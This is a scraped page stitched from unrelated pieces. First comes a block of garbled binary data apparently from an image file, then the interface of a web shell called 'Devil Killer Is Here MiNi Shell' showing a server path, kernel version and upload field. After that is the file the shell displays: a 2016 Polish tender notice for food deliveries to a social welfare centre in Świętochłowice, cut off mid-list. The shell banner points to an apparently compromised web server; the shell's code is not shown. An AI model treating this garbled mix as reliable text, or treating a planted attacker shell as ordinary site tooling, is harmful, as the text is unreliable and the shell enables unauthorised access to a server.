JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160525/133444-N-2016.html

<p class="kh_header"><b>Świętochłowice: Dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej
 w Świętochłowicach w podziale na siedem pakietów</b><br>
<b>Numer ogłoszenia: 133444 - 2016; data zamieszczenia: 25.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.swietochlowice.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej
 w Świętochłowicach w podziale na siedem pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świętochłowicach,w podziale na 7 pakietów, wraz z rozładunkiem
w  magazynie  Dziennego Domu Senior-WIGOR w Świętochłowicach  przy ul. Imieli 12.
2.	Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela artykułów w zakresie każdego z 7 pakietów. Ilości artykułów podane w tabelach
posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia,
w dni powszednie codziennie od poniedziałku do soboty w godzinach od 07:00 do 10:00. 
4.	Wykonawca zobowiązany będzie do:
a)	bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne,
b)	należytego zabezpieczenia towaru na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu),
c)	wniesienia wraz z rozładunkiem w magazynie określonym w ust. 1 niniejszego paragrafu,
i weźmie na siebie całkowitą odpowiedzialność za towar do momentu jego odbioru
 w magazynie Zamawiającego  oraz  poniesie z tego tytułu wszelkie skutki prawne.
5.	Wykonawca zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni oraz
w godzinach wyznaczonych przez Zamawiającego.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, z okresami ważności
odpowiednimi dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7.	Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi
przepisami,  oraz z warunkami określonymi w SIWZ, musi  posiadać początkowy  termin
przydatności do spożycia. (Po podpisaniu umowy wymagane będzie dostarczenie karty
produktu, zgodnie  z obowiązującymi przepisami unijnymi w tym zakresie)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.55.00.00-8, 15.11.20.00-6, 15.30.00.00-1, 15.11.98.00-1, 03.14.25.00-3, 15.89.60.00-5, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, zgodnie z załącznikiem nr 3 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w zakresie :
- urzędowej zmiany stawki podatku VAT o różnicę wynikającą z jej dotychczasowej wielkości
a wprowadzoną zmianą,
- w przypadku zmian przepisów ogólnie obowiązujących, które mają wpływ na treść umowy, 
- w przypadku obniżenia cen producenta  lub zastosowania promocyjnej obniżki cen, Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umową po cenach odpowiednio obniżonych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.swietochlowice.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętochłowice, ul. Katowicka 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2016 godzina 09:00, miejsce: Świętochłowice, ul. Katowicka 35, pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mleko i wyroby mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Belriso - ryż na mleku 180 g
różne smaki, Zott lub równoważne 	szt.	700
Deser Jogutek   115   g
 Zott lub równoważne	szt.	800
Jogurt Jogobella 150 g - 
lub równoważne, różne smaki  oraz owocowa wyspa	szt.	2 500
Jogurt naturalny 190 g
Zott, Bakoma, Danone
lub równoważne	szt.	800
Jogurt grecki naturalny - 400 ml
Bakoma lub równoważne 	szt.	20
Deser - kaszka manna - 130 g
Smakija lub równoważne	szt.	800
Kefir - kubek 250g
Krasnystaw lub równoważne	szt.	3 000
Majonez 310 ml-
Kielecki, Winiary dekoracyjny
 lub równoważne 	szt.	200
Majonez 500 ml-
Kielecki,Winiary  lub równoważne 	szt.	100
Margaryna mleczna 250g
z Kruszwicy lub równoważne 	szt.	1 000
Margaryna 500 g -
Delma, Smakowita lub równoważne 	szt.	600
Masło Extra 200g - 82 %	szt.	5 200
Maślanka karton 1 l
Mrągowska lub równoważne 	szt.	200
Mleko 2% folia 0,9 l
Lacpol lub równoważne 	szt.	12 500
Mleko 2% karton 1 l
Łaciate, Łowickie lub równoważne 	szt.	1 500
Mleko zagęszczone niesłodzone  500 g, -Gostyń lub równoważne 	szt.	30
Mleko w proszku 0,5 kg
Łaciate, Mlekovita lub równoważne 	szt.	  5 
Ser biały półtłusty - wiaderka 1 kg, Łowicki, Krasnystaw lub równoważne 	
szt.	200
Ser biały półtłusty -
Piątnica, Figard lub równoważne 	kg	900
Ser domowy z kminkiem 	kg	150
Ser camembert 120 g
Turek, Preisident lub równoważne 	szt.	1 000
Ser feta sałatkowy 270 g 
Mlekovita, Piątnica lub równoważne 	szt.	200
Ser mascarpone  500 g	szt.	30
Serek Bakuś- różne smaki 150 g  Danio lub równoważne	szt.	700
Ser biały w kubku - 140 g
Turek, Mlekpol lub równoważne 	szt.	600
Serek topiony w plastrach - 150 g
Hochland lub równoważne 	szt.	600
Serki topione 50 g - różne smaki 	szt.	6 000
Ser żółty - Gouda, Podlaski, Morski  lub równoważne	kg	500
Ser żółty wędzony - różne	kg	15
Ser żółty w plastrach - 150 g
Edamski, Gouda lub równoważne 	szt.	1 200
Śmietana 12% - kubek 0,2  l
Krasnystaw, Piątnica lub równoważne 	szt.	500
Śmietana 36% - karton 500 g
Łowicka lub równoważne 	szt.	30
Śmietana 30 % - folia 0,25 l	szt.	1 040
Śmietanki jednorazowe 10 g x10 
Zott lub równoważne 	op.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.55.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> drób,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ćwiartka z kurczaka ( udka)	kg	430
Filet z indyka	kg	 10
Filet z kurczaka	kg	260
Gulasz drobiowy	kg	120
Gulasz z indyka	kg	280
Kurczak świeży	kg	800
Pałki z kurczaka 	kg	270
Porcje rosołowe z kurczaka	kg	150
Serca	kg	40
Udziec z indyka	kg	40
Wątróbka drobiowa 
z kurczaka	kg	170
Żołądki	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.29.99-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Botwinka 
( min. 3 sztuki w pęczku)	pęczek	20
Brzoskwinia 	kg	50
Burak czerwony	kg	      1 000
Cebula	kg	700
Czosnek	kg	80
Jabłko	kg	500
Kalafior świeży (nie mniejszy niż 15 cm średnicy)	szt.	300
Kalarepa
( min. 3 sztuki w pęczku)	pęczek	250
Kapusta biała	kg	       2 000
Kapusta czerwona	kg	500
Kapusta pekińska	szt.	250
Kapusta włoska	kg	150
Koperek zielony	pęczek	1 000
Marchew	kg	1 000
Nektarynka	kg	20
Ogórek zielony	kg	200
Papryka czerwona	kg	40
Papryka żółta	kg	5
Papryka zielona	kg	5
Pieczarka	kg	500
Pietruszka korzeń	kg	60
Pietruszka zielona	pęczek	750
Pomidory	kg	300
Pomidorki koktajlowe 	kg 	5
Por	kg	 20
Rzepa biała	kg	 2
Rzodkiewka	pęczek	50
Sałata zielona	szt.	300
Seler korzeń	kg	100
Szczypiorek	pęczek	100
Szpinak świeży	kg	 20
Śliwka	kg	20
Winogrona białe	kg	50
Truskawka	kg	 50
Ziemniak nowy 
( od 01 czerwca-31 lipca) 	kg	3 600
Ziemniak stary 
( od 01 grudnia- 31 maja)	kg	10 000
Ziemniak nowy ( od 1 lipca do 30 listopada - nie mniejszy niż o średnicy
 5-6 cm) 	kg	6 400
Ananas	szt	10
Banan	kg	100
Cytryna	kg	10
Grejfrut	kg	5
Kapusta kiszona	kg	100
Kiwi	szt.	80
Mandarynka	kg	100
Ogórek kiszony	kg	600
Pomarańcza	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aronia 
( w paczkach ok. 2,5 kg)	kg	20
Bukiet jarzyn 6-mix
( w paczkach ok. 2,5 kg)	kg	600
Czarna porzeczka 
( w paczkach ok. 2,5 kg)	kg	300
Fasolka szparagowa
( w paczkach ok. 2,5 kg)	kg	350
Groszek zielony
( w paczkach ok. 2,5 kg)	kg	30
Kalafior mrożony
( w paczkach ok.. 2,5 kg)	kg	80
Lody na patyku - różne smaki - 110 ml	szt.	300
Lody - opak 1 kg 	kg	10
Marchew mrożona 
( w paczkach ok. 2,5 kg)	kg	 35
Mieszanka owocowa
( w paczkach ok. 2,5 kg)	kg	160
Pierogi z serem  
( w paczkach 1 kg)	kg	 20
Pierogi z owocami
( w paczkach 1 kg)	kg	 20
Szpinak brykiety
( w paczkach ok. 2,5 kg)	kg	190
Truskawka
( w paczkach ok. 2,5  kg)	kg	 30
Wiśnia bez pestek
( w paczkach ok. 2,5 kg)	kg	 20
Włoszczyzna paski wieloskładnikowa 
( w paczkach ok. 2,5 kg)	kg	 4 650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet śledziowy w śmietanie 300g
Lisner lub równoważne 	szt.	260
Filet z  czerniaka 
 (jednokrotnie glazurowany)	kg	190
Filet z makreli w oleju - 170 g
Lisner, Nautica, Super Fisch
 lub równoważne 	szt.	400
Filet z makreli w pomidorach 170g, Lisner, Nautica, Super fisch  lub równoważne 	szt.	400
Filet z mintaja 
(jednokrotnie glazurowany)	kg	 30
Filet z  pangi
 (jednokrotnie glazurowany)	kg	350
Filet z zielonego śledzia (jednokrotnie glazurowany)	kg	160
Karp Żywy	kg	20
Łosoś wędzony 	kg	2
Makrela wędzona 	kg	160
Paprykarz szczeciński 135g
Dega, Grall, BMC 
lub równoważne 	szt	700
Pasta 80g z tuńczyka, makreli
Pastella lub równoważne	szt	500
Pasta z łososia 125g- tuba	szt	10
Pasta z tuńczyka  125g- tuba	szt	10
Sałatka warzywna ze śledziem, 
kurczakiem, boczkiem 150g
Lisner lub równoważne 	szt	420
Śledzik na raz 100 g- różne smaki, Lisner lub równoważne 	szt	420
Śledź matjas  (lekko solony)	kg	      320.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.19.60-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze-
 klasa- wagowa M,
 klasa jakości A	szt.	32 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> pozostałe artkuły żywnościowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chrupki kukurydziane 250 g 	szt	20
Fasola biała Jaś w opakowaniach 5 kg lub 10 kg	kg	150
Fasola kolorowa w opakowaniach 5 kg lub 10 kg	kg	50
Groch łuskany w opakowaniach
 5 kg lub 10 kg 	kg	150
Kasza gryczana prażona 	kg 	150
Kasza jęczmienna średnia	kg	320
Kasza manna
z Młyna w Stoisławiu	kg	320
Kleik ryżowy 180 g
Bobovita lub równoważne 	szt	5
Kluski na parze 300 g - buchty	szt	50
Kolendra 20 g	szt	50
Konserwy drobiowe 130 g	szt	400
Konserwy turystyczne 130 g	szt	500
Konserwy tyrolskie 130 g	szt	500
Mak - luzem	kg	40
Makaron- cienkie nitki 	kg	200
Makaron- kolanka, muszelki	kg	550
Mąka pszenna typ 450 
Opak. 1 kg	kg	1000
 Mąka razowa z otrębami ( żytnia)	kg	100
Miodziki jednorazowe 25 g 	szt.	30
Miód prawdziwy 400 g	szt.	10
Olej uniwersalny  3 l	szt. 	250
Orzechy włoskie 100 g
Kresto lub równoważne 	szt	100
Orzechy włoskie łuskane	kg	2
Pasztet drobiowy w puszce 160 g 
Drosed lub równoważny  	szt	1200
Płatki owsiane górskie  500 g 	
kg	
150
Ryż opak. 1 kg	kg	900
Soczki małe 0,2 l w kartoniku- różne smaki	szt	550
Soczki owocowe 1 l w kartonie
Tymbark, Tortex lub równoważne 	szt	80
Sucharki  - paczka 450 g  	szt	25
Wafle ryżowe naturalne - 
